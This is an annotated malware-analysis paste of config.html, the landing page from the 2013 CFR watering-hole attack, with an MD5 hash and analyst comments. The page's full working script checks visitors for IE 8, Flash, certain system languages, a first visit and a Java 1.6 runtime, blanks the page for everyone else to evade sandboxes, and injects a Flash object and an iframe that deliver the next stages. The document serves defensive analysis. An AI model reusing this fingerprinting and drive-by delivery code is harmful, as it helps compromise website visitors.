StopMalvertising

config.html

Jan 2nd, 2013
  1. http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/
  2.  
  3. config.html
  4. MD5: a25c13d4edb207e6ce153469c1104223
  5. -----------------------------------------------------------------------------------------------------
  6. <html>
  7. <head>
  <!-- Analyst note: deployJava.js is referenced by a relative path, so it is fetched from the same directory as this page; the inline script below calls deployJava.versionCheck() from it. -->
  8. <script src=deployJava.js></script>
  9. <script type="text/javascript">
  // Returns the unescape()d text of document.cookie that starts at `offset` and
  // runs up to the next ";" (or to the end of the cookie string when no ";" follows).
  // Called by GetCookie with the offset just past "name=".
  10. function getCookieVal (offset)
  11. {
  12. var endstr = document.cookie.indexOf (";", offset);
  13. if (endstr == -1)
  14. {
  // No terminator found: the value is the last one in the cookie string.
  15. endstr = document.cookie.length;
  16. }
  17. return unescape(document.cookie.substring(offset, endstr));
  18. }
  // Looks up the cookie called `name` in document.cookie.
  // Returns its decoded value (via getCookieVal) or null when no "name=" prefix is found.
  19. function GetCookie (name)
  20. {
  21. var arg = name + "=";
  22. var alen = arg.length;
  23. var clen = document.cookie.length;
  24. var i = 0;
  25. while (i < clen)
  26. {
  27. var j = i + alen;
  // Compare only at the current scan position: index 0, then the character after each space.
  28. if (document.cookie.substring(i, j) == arg)
  29. return getCookieVal (j);
  // Advance to just past the next space; indexOf() returning -1 makes i == 0, which ends the scan.
  30. i = document.cookie.indexOf(" ", i) + 1;
  31. if (i == 0)
  32. break;
  33. }
  34. return null;
  35. }
  // Writes a cookie `name` = escape(value) to document.cookie.
  // Up to four further positional arguments are read through SetCookie.arguments:
  //   [2] expires (an object with toGMTString(), i.e. a Date), [3] path, [4] domain, [5] secure flag.
  // Attributes whose argument is missing or null are left out of the cookie string.
  36. function SetCookie (name, value)
  37. {
  38. var argv = SetCookie.arguments;
  39. var argc = SetCookie.arguments.length;
  40. var expires = (2 < argc) ? argv[2] : null;
  41. var path = (3 < argc) ? argv[3] : null;
  42. var domain = (4 < argc) ? argv[4] : null;
  43. var secure = (5 < argc) ? argv[5] : false;
  44. document.cookie = name + "=" + escape (value) +
  45. ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  46. ((path == null) ? "" : ("; path=" + path)) +
  47. ((domain == null) ? "" : ("; domain=" + domain)) +
  48. ((secure == true) ? "; secure" : "");
  49. }
  // Per-browser visit counter. Reads the "visit" cookie (0 when absent), increments it,
  // writes it back with path "/" and a 7-day expiry, and returns the new count.
  // Analyst note: the top-level code uses the returned count to send any repeat visitor
  // (count > 1) to about:blank, so the "visit" cookie is a host-side artifact of a first load.
  50. function DisplayInfo()
  51. {
  52. var expdate = new Date();
  53. var visit;
  // 24 h * 60 min * 60 s * 1000 ms * 7 = seven days from now.
  54. expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000*7 ));
  55. if(!(visit = GetCookie("visit")))
  56. visit = 0;
  57. visit++;
  58. SetCookie("visit", visit, expdate, "/", null, false);
  59. return visit;
  60. }
  // Visitor filtering, executed while the page is parsed. Each failed check assigns
  // location.href = "about:blank"; there is no return or throw, so the later statements
  // in this run are still evaluated.
  // Analyst note: a client that fails any check (most crawlers and sandboxes that are not
  // IE 8 with Flash and a listed language) is shown a blank page, so a blank result when
  // fetching this URL does not show that the page is harmless.
  61. var ua = window.navigator.userAgent.toLowerCase();
  62.  
  // Check 1: the User-Agent must contain "msie 8.0" (Internet Explorer 8).
  63. if (ua.indexOf('msie 8.0') <0)
  64. {
  65. location.href="about:blank";
  66. }
  67.  
  // Check 2: the Flash ActiveX control must be instantiable. f stays the number 0 when
  // the constructor throws, so typeof f is "object" only when Flash for IE is installed.
  68. var f = 0;
  69. try {
  70. f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  71. }
  72. catch (e) {
  73. }
  74. var g=typeof f;
  75.  
  76. if(g!="object")
  77. {
  78. location.href="about:blank";
  79. }
  // Check 3: the IE-specific navigator.systemLanguage must be one of
  // zh-cn, en-us, zh-tw, ja, ru or ko.
  80. var h=navigator.systemLanguage.toLowerCase();
  81.  
  82. if(h!="zh-cn" && h!="en-us" && h!= "zh-tw"&& h!= "ja" && h!= "ru"&&h!= "ko" )
  83. {
  84.  
  85. location.href="about:blank";
  86. }
  87.  
  // Check 4: only the first visit counted by the "visit" cookie proceeds; DisplayInfo()
  // also sets or refreshes that cookie as a side effect of this call.
  88. var num=DisplayInfo();
  89. if(num >1)
  90. {
  91. location.href="about:blank";
  92. }
  // Runs from <body onload>. Issues an asynchronous GET for "xsainfo.jpg" (relative to this
  // page) and, once it completes with HTTP 200, chooses by OS token in the User-Agent whether
  // to append a Flash <object> for today.swf plus an <iframe> for news.html to the document.
  // Only the status code is used here; the response body of xsainfo.jpg is never read in this
  // script. Whether today.swf or news.html make use of it cannot be told from this file.
  // Analyst note: xsainfo.jpg, today.swf, news.html and deployJava.js are all requested from
  // the same directory as config.html, which makes the set of relative requests a useful
  // proxy/web-log correlation point.
  93. function download()
  94. {
  95. var xmlhttp;
  96. try
  97. {
  98. xmlhttp = new XMLHttpRequest();
  99. }
  100. catch (e)
  101. {
  // Fallback for browsers without a native XMLHttpRequest: try the MSXML ProgIDs in order
  // and keep the first one that can be instantiated.
  102. var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  103. var success = false;
  104. for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  105. {
  106. try
  107. {
  108. xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  109. success = true;
  110. } catch (e)
  111. {}
  112. }
  113. }
  // readystatechange handler; acts only when the request is complete (readyState 4) with status 200.
  114. function callback()
  115. {
  116. if(xmlhttp.readyState==4)
  117. {
  118. if(xmlhttp.status==200)
  119. {
  // `ua` is the lower-cased User-Agent from the top-level code; with spaces removed,
  // "windows nt 6.1" becomes "windowsnt6.1", so the indexOf tests below match the NT version token.
  120. var temp=ua.replace(/ /g,"");
  // Branch A: "nt6.1" (the Windows 7 / Server 2008 R2 token).
  121. if (temp.indexOf("nt6.1")>-1) {
  122.  
  123.  
  // Requires versionCheck('1.6.0+') true and versionCheck('1.7.0+') false. Assuming deployJava.js
  // is the stock Java Deployment Toolkit script, that means a Java 1.6.x runtime is installed
  // and no 1.7 or later one. TODO confirm against the deployJava.js served with this page.
  124. if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  125.  
  126.  
  // Marks the hidden #test element with "default", then appends the Flash ActiveX <object>
  // (CLSID D27CDB6E-AE6D-11cf-96B8-444553540000) for today.swf and an <iframe> for news.html.
  127. document.getElementById('test').innerHTML="default";
  128. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  129.  
  130. }
  131. else
  132. {
  133. location.href="about:blank";
  134. }
  135. }
  // Branch B: "nt5.1" (the Windows XP token). No Java version check; #test is set to "cat"
  // and the same <object>/<iframe> markup as in branch A is appended.
  136. else if(temp.indexOf("nt5.1")>-1)
  137. {
  138.  
  139. document.getElementById('test').innerHTML="cat";
  140. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  141.  
  142. }
  // Any other OS token: blank page.
  143. else
  144. {
  145. location.href="about:blank";
  146. }
  147.  
  148. }
  149. }
  150. }
  // Asynchronous request (third argument true); callback fires on each readyState change.
  151. xmlhttp.open("get", "xsainfo.jpg", true);
  152. xmlhttp.onreadystatechange = callback;
  153. xmlhttp.send(null);
  154. }
  155.  
  156. </script>
  157. </head>
  <!-- Analyst note: download() is invoked once the page has loaded. The hidden #test div is the element whose content the script overwrites with "default" or "cat". -->
  158. <body onload="download()">
  159. <div style=display:none>
  160. <div id=test>hello</div>
  161. </div>
  162. </body>
  163. </html>